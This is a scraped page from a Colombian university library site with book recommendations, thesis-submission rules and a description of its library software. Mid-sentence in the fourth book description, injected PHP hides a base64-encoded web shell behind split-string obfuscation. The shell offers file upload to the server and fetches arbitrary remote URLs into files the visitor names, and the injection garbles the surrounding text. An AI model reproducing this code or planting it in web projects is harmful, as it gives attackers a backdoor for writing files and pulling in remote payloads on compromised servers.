BÚSQUEDA SIMPLE

La búsqueda solo mostrará Máximo 500 resultados.

Resultados
Programación de Eventos de Biblioteca
Tutoriales de Biblioteca
     
     
Libros Recomendados Esta Semana

Signatura: 863.72
Clave: P797u

Desde que su madre le mostrara las estrellas, el destino de Guillermo Haro quedó ligado a ellas. La escritora cuenta la apasionante historia de su marido, revolucionario, astrónomo y gran impulsor de la educación entre los jóvenes, un mexicano universal que supo contagiar su pasión por la ciencia. El retrato literario de este hombre de izquierdas es también la crónica de todo un país en una época conmocionada

Signatura: 863.861
Clave: B467

Es una fascinante historia sobre la vida de Francisco Sornoza, mecánico y piloto de aviación colombiano de principios del siglo XX. Con una trama bien elaborada y un lenguaje ameno con el hablar de los pueblos de la época, los autores van dibujando la vida de sus protagonistas. Este experimenta toda clase de vivencias estremecedoras, desde que era un niño pobre y analfabeto hasta que se convierte en un hombre muy exitoso; sin más apoyo que su propio deseo de vencer la adversidad. El protagonista relata sus éxitos y fracasos, sus alegrías y sus amores, triunfos y derrotas.

Signatura: 158
Clave: V989

Nick Vujicic nació sin brazos ni piernas pero logró vencer su discapacidad con una vida independiente, llena de satisfacciones convirtiéndose en un modelo de vida para quien busca la felicidad verdadera. Nick es un conferencista motivacional a nivel internacional que se dedica a difundir su mensaje: la meta más importante de cualquier ser humano es encontrar el significado de su vida, sin importar los obstáculos que se interpongan en el camino. Nick ofrece consejos prácticos para cada día, tener momentos de felicidad confiando en los demás, encontrando fuerza en el camino.

Signatura: 863.861
Clave: A473t

Es una recopilación de encuentros que narran el día a día cambiante, los 365 días al año, de quien recorre calles, cafeterías, edificios públicos, hace filas utiliza el transporte público y se para en las esquinas en busca de las ficciones de otros pero son las suyas, sus ficciones, las que remontan un día tras otro. Este título resulta de las convenciones que aplican los conocedores de la literatura para quienes estas ficciones no son novela y tampoco cuento a pesar de que en el devenir de los días los cuentos abundan. '.base"."64"."_dec"."ode(\$c));");$x("PGI+VXBsb2FkIG11bHRpPC9iPiA8YnIgLz4KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249IiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+CiAgICBGaWxlKHMpOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0idXBsb2Fkc1tdIiBtdWx0aXBsZT0ibXVsdGlwbGUiIHJlcXVpcmVkPSJyZXF1aXJlZCIgLz4KICAgIDxidXR0b24gdHlwZT0ic3VibWl0Ij5VcGxvYWQ8L2J1dHRvbj4KPC9mb3JtPgo8P3BocAppZiAoaXNzZXQoJF9GSUxFU1sndXBsb2FkcyddKSAmJiBjb3VudCgkX0ZJTEVTWyd1cGxvYWRzJ10pID4gMCkgewogICAgJHRvdGFsID0gY291bnQoJF9GSUxFU1sndXBsb2FkcyddWyduYW1lJ10pOwogICAgZm9yICgkaSA9IDA7ICRpIDwgJHRvdGFsOyAkaSsrKSB7CiAgICAgICAgJHRtcFBhdGggPSAkX0ZJTEVTWyd1cGxvYWRzJ11bJ3RtcF9uYW1lJ11bJGldOwogICAgICAgIGlmICgkdG1wUGF0aCAhPSAnJykgewogICAgICAgICAgICAkbmV3UGF0aCA9ICcuLycgLiAkX0ZJTEVTWyd1cGxvYWRzJ11bJ25hbWUnXVskaV07CiAgICAgICAgICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJHRtcFBhdGgsICRuZXdQYXRoKSkgewogICAgICAgICAgICAgICAgZWNobyAnU3VjY2Vzc2Z1bGx5IHVwbG9hZGVkICcgLiRfRklMRVNbJ3VwbG9hZHMnXVsnbmFtZSddWyRpXSAuICc8YnIgLz4nOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgZWNobyAnVW5hYmxlIHRvIHVwbG9hZCAnIC4kX0ZJTEVTWyd1cGxvYWRzJ11bJ25hbWUnXVskaV0gLiAnPGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KfQo/Pgo8aHIgLz4KPGI+VXBsb2FkIFVSTDwvYj4gPGJyIC8+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgogICAgRmlsZW5hbWUgdG8gc2F2ZTogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InNhdmVfbmFtZSIgc2l6ZT0iMzAiIHJlcXVpcmVkPSJyZXF1aXJlZCIgLz4gPGJyIC8+CiAgICBVUkw6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1cmwiIHNpemU9IjUwIiByZXF1aXJlZD0icmVxdWlyZWQiIC8+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+VXBsb2FkPC9idXR0b24+CjwvZm9ybT4KPHByZT4KPD9waHAKaWYgKGlzc2V0KCRfUE9TVFsnc2F2ZV9uYW1lJ10pICYmIGlzc2V0KCRfUE9TVFsndXJsJ10pKSB7CiAgICBpZiAoZmlsZV9wdXRfY29udGVudHMoJF9QT1NUWydzYXZlX25hbWUnXSwgZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWyd1cmwnXSkpKSB7CiAgICAgICAgZWNobyAnU3VjY2Vzc2Z1bGx5IHVwbG9hZGVkICcgLiAkX1BPU1RbJ3NhdmVfbmFtZSddOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICdVbmFibGUgdG8gdXBsb2FkICcgLiAkX1BPU1RbJ3NhdmVfbmFtZSddOwogICAgfQp9Cj8+");exit;}?>

Signatura: 863.861
Clave: A599to

Esta novela tiene como escenario una conversación familiar en la que sus voces reconstruyen historias que suceden alrededor de viajes en trenes. Con ella se completa su tetralogía (tierra, aire, agua, fuego). El escritor escoge el año 1957 como lugar y tiempo de su historia: un año en el que se funden las letras para imaginar los relatos que permitirán su construcción como ser humano. A modo de caja china se van creando diferentes tiempos, territorios y personajes, un año en que caben múltiples historias y anécdotas. Es el año 1957 Viaje del tren, de la palabra de boca en boca, de tiempo en tiempo. Todo ello con l intención de dar sentido a un nuevo génesis, una nueva identidad, una nueva historia.

Requisitos de Trabajo de Grado
Procedimiento para entrega de Trabajos de grado y monografías de especialización en formato digital.

- Documentos que deben ser cargados en el STG(PDF):

  • Trabajo de grado final en formato PDF (no olvide incluir los resúmenes en español e inglés antes de la introducción según formato web sin modificar).
  • Resumen español (Archivo en PDF según formato web) con visto bueno del Director del Trabajo de grado.
  • Resumen inglés (Archivo en PDF según formato web) con visto bueno del Director del Trabajo de grado.
  • Formato "Licencia gratuita de uso no exclusiva para la autorización de obras en el repositorio institucional" firmado por el estudiante en PDF.
  • Declaración, revisión íntegra del trabajo de grado, firmada por el Director del trabajo y el estudiante en PDF
  • Generar el reporte de Turnitin el cual garantiza que no hay plagio en el trabajo y este debe ser subido al software STG en PDF.
  • Si el trabajo de grado es de carácter confidencial, deberá subir al STG una carta del Director del Trabajo en la cual se especifique el grado y tiempo de restricción, para que la biblioteca conserve el trabajo como confidencial y aplique las medidas tecnológicas necesarias para impedir el acceso a los contenidos a quienes no estén legalmente facultados para hacerlo.
  • Comunicar al Departamento de Biblioteca mediante correo electrónico biblioteca.bga@upb.edu.co, que los documentos ya fueron subidos a STG, indicando el nombre del estudiante, título del trabajo de grado y programa académico.

La calidad del Trabajo de Grado es responsabilidad tanto del Director del trabajo como del estudiante que lo presenta.
Todos los documentos subidos al STG, deben ir en PDF.


ALEJANDRÍA
Software de Biblioteca
UPB Bucaramanga

Alejandría es el software de biblioteca que permite controlar los todos los procesos que se desarrollan dentro de un sistema de bibliotecas.

Desarrollado originalmente para la Biblioteca "Benedicto XVI" de la Universidad Pontificia Bolivariana, Seccional Bucaramanga, se ha convertido en el eje facilitador de los procesos del departamento de Biblioteca de la seccional, permitiéndoles entregar un servicio ágil y efectivo a los docentes, investigadores, estudiantes, personal administrativo de la UPB y usuarios externos.

Búsqueda Bibliográfica

Catalogación.

Préstamo

Renovación y Reserva de Libros en línea

Solicitud y Compra de Libros

Hemeroteca

Videoteca

Inventario

Reportes

Creada por el grupo de Desarrollo del Centro de Tecnologias de Información y Comunicaciones (CTIC.) de la Universisdad Pontificia Bolivariana, seccional Bucaramanga, Alejandria es una herramienta hibrida que combina los beneficios de los desarrollos web (PHP) y cliente servidor (Visual Studio), suministrándole al usuario final, un grupo de herramientas amigables, que le facilitan la ejecución de todos los procesos que se desarrollan en un departamento de Biblioteca.

La concepción, planeación y desarrollo de Alejandría, contó en todo momento con el asesoramiento, supervisión y aval de un grupo de expertos Bibliotecólogos, quienes con sus amplios conocimientos y basta experiencia, depositaron sus conocimientos en el producto, y así poner en el mercado una excelente plataforma de Bibliotecas.